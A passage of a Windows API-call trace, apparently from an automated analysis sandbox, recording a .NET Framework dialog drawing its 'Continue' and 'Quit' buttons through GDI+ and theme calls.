nSavedDC=-1) returned 1 [0058.327] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.327] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.327] GetSystemMetrics (nIndex=42) returned 0 [0058.327] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb08, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.327] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb08) returned 0x18 [0058.327] RestoreDC (hdc=0xcf0101b7, nSavedDC=-1) returned 1 [0058.327] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcf0101b7) returned 0x0 [0058.327] IsAppThemed () returned 0x1 [0058.327] GetThemeAppProperties () returned 0x3 [0058.327] GetThemeAppProperties () returned 0x3 [0058.327] IsAppThemed () returned 0x1 [0058.328] GetThemeAppProperties () returned 0x3 [0058.328] GetThemeAppProperties () returned 0x3 [0058.328] IsThemePartDefined () returned 0x1 [0058.328] GdipCreateRegion (region=0x3adf00) returned 0x0 [0058.328] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.328] GdipCreateMatrix (matrix=0x3adf00) returned 0x0 [0058.328] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.328] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3adf18) returned 0x0 [0058.328] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.328] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.328] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.328] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.328] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.328] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.328] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.328] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf40) returned 0x0 [0058.328] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf30) returned 0x0 [0058.328] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adf30) returned 0x0 [0058.328] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.328] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf48) returned 0x0 [0058.328] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.328] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.328] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.328] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.328] SaveDC (hdc=0xcf0101b7) returned 1 [0058.328] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x57040871 [0058.329] GetClipRgn (hdc=0xcf0101b7, hrgn=0x57040871) returned 0 [0058.329] SelectClipRgn (hdc=0xcf0101b7, hrgn=0xe0040827) returned 2 [0058.329] DeleteObject (ho=0x57040871) returned 1 [0058.329] DeleteObject (ho=0xe0040827) returned 1 [0058.329] OffsetViewportOrgEx (in: hdc=0xcf0101b7, x=0, y=0, lppt=0x245fad8 | out: lppt=0x245fad8) returned 1 [0058.329] IsAppThemed () returned 0x1 [0058.329] GetThemeAppProperties () returned 0x3 [0058.329] GetThemeAppProperties () returned 0x3 [0058.329] DrawThemeBackground () returned 0x0 [0058.329] RestoreDC (hdc=0xcf0101b7, nSavedDC=-1) returned 1 [0058.329] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcf0101b7) returned 0x0 [0058.329] GdipCreateRegion (region=0x3adee8) returned 0x0 [0058.329] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.329] GdipCreateMatrix (matrix=0x3adee8) returned 0x0 [0058.329] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.329] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3adf00) returned 0x0 [0058.329] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.329] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.329] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.329] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.329] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.329] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.329] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.329] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf28) returned 0x0 [0058.330] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf18) returned 0x0 [0058.330] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adf18) returned 0x0 [0058.330] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.330] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf30) returned 0x0 [0058.330] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.330] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.330] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.330] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.330] SaveDC (hdc=0xcf0101b7) returned 1 [0058.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe1040827 [0058.330] GetClipRgn (hdc=0xcf0101b7, hrgn=0xe1040827) returned 0 [0058.330] SelectClipRgn (hdc=0xcf0101b7, hrgn=0x58040871) returned 2 [0058.330] DeleteObject (ho=0xe1040827) returned 1 [0058.330] DeleteObject (ho=0x58040871) returned 1 [0058.330] OffsetViewportOrgEx (in: hdc=0xcf0101b7, x=0, y=0, lppt=0x245fdac | out: lppt=0x245fdac) returned 1 [0058.330] IsAppThemed () returned 0x1 [0058.330] GetThemeAppProperties () returned 0x3 [0058.330] GetThemeAppProperties () returned 0x3 [0058.330] GetThemeBackgroundContentRect () returned 0x0 [0058.330] RestoreDC (hdc=0xcf0101b7, nSavedDC=-1) returned 1 [0058.330] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcf0101b7) returned 0x0 [0058.330] IsAppThemed () returned 0x1 [0058.330] GetThemeAppProperties () returned 0x3 [0058.331] GetThemeAppProperties () returned 0x3 [0058.331] GdipGetTextRenderingHint (graphics=0x4e4f360, mode=0x3ae060) returned 0x0 [0058.331] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae04c) returned 0x0 [0058.331] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.331] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.331] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.331] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.331] SaveDC (hdc=0xcf0101b7) returned 1 [0058.331] GetTextAlign (hdc=0xcf0101b7) returned 0x0 [0058.331] GetTextColor (hdc=0xcf0101b7) returned 0x0 [0058.331] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.331] GetObjectW (in: h=0x18a002e, c=92, pv=0x3add54 | out: pv=0x3add54) returned 92 [0058.331] SelectObject (hdc=0xcf0101b7, h=0x2d0a07c0) returned 0x18a002e [0058.331] GetBkMode (hdc=0xcf0101b7) returned 2 [0058.331] SetBkMode (hdc=0xcf0101b7, mode=1) returned 2 [0058.331] DrawTextExW (in: hdc=0xcf0101b7, lpchText="&Continue", cchText=9, lprc=0x3ade28, format=0x102415, lpdtp=0x2460140 | out: lpchText="&Continue", lprc=0x3ade28) returned 13 [0058.331] DrawTextExW (in: hdc=0xcf0101b7, lpchText="&Continue", cchText=9, lprc=0x3adfe0, format=0x102015, lpdtp=0x2460140 | out: lpchText="&Continue", lprc=0x3adfe0) returned 13 [0058.332] RestoreDC (hdc=0xcf0101b7, nSavedDC=-1) returned 1 [0058.332] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcf0101b7) returned 0x0 [0058.332] GetFocus () returned 0x201f4 [0058.332] IsAppThemed () returned 0x1 [0058.332] GetThemeAppProperties () returned 0x3 [0058.332] GetThemeAppProperties () returned 0x3 [0058.332] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae238) returned 0x0 [0058.332] BitBlt (hdc=0x101084f, x=0, y=0, cx=100, cy=23, hdcSrc=0xcf0101b7, x1=0, y1=0, rop=0xcc0020) returned 1 [0058.333] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcf0101b7) returned 0x0 [0058.333] SelectPalette (hdc=0x101084f, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.333] SelectObject (hdc=0xcf0101b7, h=0x185000f) returned 0x3e050241 [0058.333] DeleteDC (hdc=0xcf0101b7) returned 1 [0058.333] GdipDeleteGraphics (graphics=0x4e4f360) returned 0x0 [0058.333] EndPaint (hWnd=0x201e6, lpPaint=0x3ae1dc) returned 1 [0058.333] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.333] IsWindowUnicode (hWnd=0x201e8) returned 1 [0058.333] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.333] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.333] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.333] BeginPaint (in: hWnd=0x201e8, lpPaint=0x3ae1e0 | out: lpPaint=0x3ae1e0) returned 0x101084f [0058.333] SelectPalette (hdc=0x101084f, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.333] CreateCompatibleDC (hdc=0x101084f) returned 0xd10101b7 [0058.333] SelectObject (hdc=0xd10101b7, h=0x3e050241) returned 0x185000f [0058.333] GdipCreateFromHDC (hdc=0xd10101b7, graphics=0x3ae1f8) returned 0x0 [0058.333] GdipTranslateWorldTransform (graphics=0x4e4f360, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0058.333] GdipSetClipRectI (graphics=0x4e4f360, x=0, y=0, width=100, height=23, combineMode=0x0) returned 0x0 [0058.333] GdipCreateMatrix (matrix=0x3ae240) returned 0x0 [0058.333] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.333] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3ae258) returned 0x0 [0058.334] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.334] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.334] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.334] GdipCreateRegion (region=0x3ae240) returned 0x0 [0058.334] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.334] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3ae24c) returned 0x0 [0058.334] GdipSaveGraphics (graphics=0x4e4f360, state=0x3ae278) returned 0x0 [0058.334] GdipRestoreGraphics (graphics=0x4e4f360, state=0xfdac0dbd) returned 0x0 [0058.334] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.334] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae064) returned 0x0 [0058.334] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.334] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.334] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.334] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.334] SaveDC (hdc=0xd10101b7) returned 1 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0xa0a0a0) returned 0xa0a0a0 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0x696969) returned 0x696969 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0xa0a0a0) returned 0xa0a0a0 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0x0) returned 0x0 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0xffffff) returned 0xffffff [0058.334] GetNearestColor (hdc=0xd10101b7, color=0xe5e5e5) returned 0xe5e5e5 [0058.334] GetNearestColor (hdc=0xd10101b7, color=0xd7d7d7) returned 0xd7d7d7 [0058.335] GetNearestColor (hdc=0xd10101b7, color=0x0) returned 0x0 [0058.335] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.335] GdipReleaseDC (graphics=0x4e4f360, hdc=0xd10101b7) returned 0x0 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x3ae0cc, fWinIni=0x0 | out: pvParam=0x3ae0cc) returned 1 [0058.335] SendMessageW (hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.335] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] DrawTextExW (in: hdc=0x7701083a, lpchText="&Quit", cchText=5, lprc=0x3adf20, format=0x102415, lpdtp=0x2460938 | out: lpchText="&Quit", lprc=0x3adf20) returned 13 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetFocus () returned 0x201f4 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] IsThemePartDefined () returned 0x1 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0058.335] IsAppThemed () returned 0x1 [0058.335] GetThemeAppProperties () returned 0x3 [0058.335] GetThemeAppProperties () returned 0x3 [0058.336] IsAppThemed () returned 0x1 [0058.336] GetThemeAppProperties () returned 0x3 [0058.336] GetThemeAppProperties () returned 0x3 [0058.336] IsThemePartDefined () returned 0x1 [0058.336] GdipCreateRegion (region=0x3adf68) returned 0x0 [0058.336] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.336] GdipCreateMatrix (matrix=0x3adf68) returned 0x0 [0058.336] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.336] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3adf80) returned 0x0 [0058.336] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.336] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.336] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.336] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.336] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.336] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.336] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.336] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adfa8) returned 0x0 [0058.336] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf98) returned 0x0 [0058.336] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adf98) returned 0x0 [0058.336] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.336] GdipGetDC (graphics=0x4e4f360, hdc=0x3adfb0) returned 0x0 [0058.336] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.336] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.336] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.336] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.337] SaveDC (hdc=0xd10101b7) returned 1 [0058.337] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x59040871 [0058.337] GetClipRgn (hdc=0xd10101b7, hrgn=0x59040871) returned 0 [0058.337] SelectClipRgn (hdc=0xd10101b7, hrgn=0xe5040827) returned 2 [0058.337] DeleteObject (ho=0x59040871) returned 1 [0058.337] DeleteObject (ho=0xe5040827) returned 1 [0058.337] OffsetViewportOrgEx (in: hdc=0xd10101b7, x=0, y=0, lppt=0x2460fe8 | out: lppt=0x2460fe8) returned 1 [0058.337] DrawThemeParentBackground () returned 0x0 [0058.337] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3add24 | out: lpwndpl=0x3add24) returned 1 [0058.337] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adcd0 | out: lpRect=0x3adcd0) returned 1 [0058.337] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.337] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.337] GetSystemMetrics (nIndex=42) returned 0 [0058.337] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb74, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.337] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb74) returned 0x18 [0058.337] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adbd8 | out: lpRect=0x3adbd8) returned 1 [0058.337] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.337] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.337] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.337] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.337] SaveDC (hdc=0xd10101b7) returned 2 [0058.337] GetNearestColor (hdc=0xd10101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.337] CreateSolidBrush (color=0xf0f0f0) returned 0x20100257 [0058.338] FillRect (hDC=0xd10101b7, lprc=0x3ada78, hbr=0x20100257) returned 1 [0058.338] DeleteObject (ho=0x20100257) returned 1 [0058.338] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.338] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.338] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.338] GetSystemMetrics (nIndex=42) returned 0 [0058.338] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb14, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.338] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb14) returned 0x18 [0058.338] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adb78 | out: lpRect=0x3adb78) returned 1 [0058.338] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.338] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.338] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.338] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.338] SaveDC (hdc=0xd10101b7) returned 2 [0058.338] GetNearestColor (hdc=0xd10101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.338] CreateSolidBrush (color=0xf0f0f0) returned 0x21100257 [0058.338] FillRect (hDC=0xd10101b7, lprc=0x3ada18, hbr=0x21100257) returned 1 [0058.338] DeleteObject (ho=0x21100257) returned 1 [0058.338] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.338] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.338] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.338] GetSystemMetrics (nIndex=42) returned 0 [0058.338] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb14, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.339] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb14) returned 0x18 [0058.339] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.339] GdipReleaseDC (graphics=0x4e4f360, hdc=0xd10101b7) returned 0x0 [0058.339] IsAppThemed () returned 0x1 [0058.339] GetThemeAppProperties () returned 0x3 [0058.339] GetThemeAppProperties () returned 0x3 [0058.339] IsAppThemed () returned 0x1 [0058.339] GetThemeAppProperties () returned 0x3 [0058.339] GetThemeAppProperties () returned 0x3 [0058.339] IsThemePartDefined () returned 0x1 [0058.339] GdipCreateRegion (region=0x3adf0c) returned 0x0 [0058.339] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.339] GdipCreateMatrix (matrix=0x3adf0c) returned 0x0 [0058.339] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.339] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3adf24) returned 0x0 [0058.339] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.339] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.339] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.339] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.339] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.339] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.339] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.339] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf4c) returned 0x0 [0058.339] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf3c) returned 0x0 [0058.339] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adf3c) returned 0x0 [0058.340] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.340] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf54) returned 0x0 [0058.340] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.340] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.340] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.340] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.340] SaveDC (hdc=0xd10101b7) returned 1 [0058.340] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe6040827 [0058.340] GetClipRgn (hdc=0xd10101b7, hrgn=0xe6040827) returned 0 [0058.340] SelectClipRgn (hdc=0xd10101b7, hrgn=0x5b040871) returned 2 [0058.340] DeleteObject (ho=0xe6040827) returned 1 [0058.340] DeleteObject (ho=0x5b040871) returned 1 [0058.340] OffsetViewportOrgEx (in: hdc=0xd10101b7, x=0, y=0, lppt=0x246196c | out: lppt=0x246196c) returned 1 [0058.340] IsAppThemed () returned 0x1 [0058.340] GetThemeAppProperties () returned 0x3 [0058.340] GetThemeAppProperties () returned 0x3 [0058.340] DrawThemeBackground () returned 0x0 [0058.340] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.340] GdipReleaseDC (graphics=0x4e4f360, hdc=0xd10101b7) returned 0x0 [0058.340] GdipCreateRegion (region=0x3adef4) returned 0x0 [0058.340] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.340] GdipCreateMatrix (matrix=0x3adef4) returned 0x0 [0058.340] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.340] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3adf0c) returned 0x0 [0058.341] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.341] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.341] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.341] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.341] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.341] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.341] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.341] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf34) returned 0x0 [0058.341] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf24) returned 0x0 [0058.341] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adf24) returned 0x0 [0058.341] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.341] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf3c) returned 0x0 [0058.341] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.341] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.341] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.341] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.341] SaveDC (hdc=0xd10101b7) returned 1 [0058.341] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5c040871 [0058.341] GetClipRgn (hdc=0xd10101b7, hrgn=0x5c040871) returned 0 [0058.341] SelectClipRgn (hdc=0xd10101b7, hrgn=0xe7040827) returned 2 [0058.341] DeleteObject (ho=0x5c040871) returned 1 [0058.341] DeleteObject (ho=0xe7040827) returned 1 [0058.342] OffsetViewportOrgEx (in: hdc=0xd10101b7, x=0, y=0, lppt=0x2461c40 | out: lppt=0x2461c40) returned 1 [0058.342] IsAppThemed () returned 0x1 [0058.342] GetThemeAppProperties () returned 0x3 [0058.342] GetThemeAppProperties () returned 0x3 [0058.342] GetThemeBackgroundContentRect () returned 0x0 [0058.342] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.342] GdipReleaseDC (graphics=0x4e4f360, hdc=0xd10101b7) returned 0x0 [0058.342] IsAppThemed () returned 0x1 [0058.342] GetThemeAppProperties () returned 0x3 [0058.342] GetThemeAppProperties () returned 0x3 [0058.342] GdipGetTextRenderingHint (graphics=0x4e4f360, mode=0x3ae06c) returned 0x0 [0058.342] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae058) returned 0x0 [0058.342] GetCurrentObject (hdc=0xd10101b7, type=0x1) returned 0x1b00017 [0058.342] GetCurrentObject (hdc=0xd10101b7, type=0x2) returned 0x1900010 [0058.342] GetCurrentObject (hdc=0xd10101b7, type=0x7) returned 0x3e050241 [0058.342] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.342] SaveDC (hdc=0xd10101b7) returned 1 [0058.342] GetTextAlign (hdc=0xd10101b7) returned 0x0 [0058.342] GetTextColor (hdc=0xd10101b7) returned 0x0 [0058.342] GetCurrentObject (hdc=0xd10101b7, type=0x6) returned 0x18a002e [0058.342] GetObjectW (in: h=0x18a002e, c=92, pv=0x3add60 | out: pv=0x3add60) returned 92 [0058.342] SelectObject (hdc=0xd10101b7, h=0x2d0a07c0) returned 0x18a002e [0058.342] GetBkMode (hdc=0xd10101b7) returned 2 [0058.343] SetBkMode (hdc=0xd10101b7, mode=1) returned 2 [0058.343] DrawTextExW (in: hdc=0xd10101b7, lpchText="&Quit", cchText=5, lprc=0x3ade34, format=0x102415, lpdtp=0x2461fd4 | out: lpchText="&Quit", lprc=0x3ade34) returned 13 [0058.343] DrawTextExW (in: hdc=0xd10101b7, lpchText="&Quit", cchText=5, lprc=0x3adfec, format=0x102015, lpdtp=0x2461fd4 | out: lpchText="&Quit", lprc=0x3adfec) returned 13 [0058.343] RestoreDC (hdc=0xd10101b7, nSavedDC=-1) returned 1 [0058.343] GdipReleaseDC (graphics=0x4e4f360, hdc=0xd10101b7) returned 0x0 [0058.343] GetFocus () returned 0x201f4 [0058.343] IsAppThemed () returned 0x1 [0058.343] GetThemeAppProperties () returned 0x3 [0058.343] GetThemeAppProperties () returned 0x3 [0058.343] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae238) returned 0x0 [0058.343] BitBlt (hdc=0x101084f, x=0, y=0, cx=100, 